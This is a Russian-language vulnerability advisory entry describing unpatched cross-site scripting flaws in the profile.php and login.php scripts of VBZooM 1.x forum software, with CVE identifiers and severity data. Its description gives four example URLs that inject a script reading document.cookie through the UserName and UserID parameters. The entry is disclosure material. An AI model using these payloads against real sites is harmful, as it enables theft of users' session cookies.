| Дата публикации: | 04.08.2005 |
| Всего просмотров: | 1580 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2005-2441 CVE-2006-1132 CVE-2006-1133 CVE-2006-3054 CVE-2006-3055 CVE-2006-3056 CVE-2006-3142 CVE-2006-4634 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | VBZooM 1.x |
| Уязвимые версии: VBZooM
Описание: Уязвимость существует в сценариях 'profile.php' и 'login.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры: http://[target]/vbzoom/profile.php?UserID=1&UserName= <br><script>alert(document.coo kie);</script> http://[target]/vbzoom/login.php?UserID='<br><script> alert(document.cookie);</script> http://[target]/vz/profile.php?UserID=1&UserName= <br><script>al ert(document.cookie);</script> http://[target]/vz/login.php?UserID='<br><script> alert(document.cookie);</script> URL производителя: www.vbzoom.com Решение: Способов устранения уязвимости не существует в настоящее время. |
|
| Ссылки: | VBZoom Cross Site Scripting Vulnerabilities |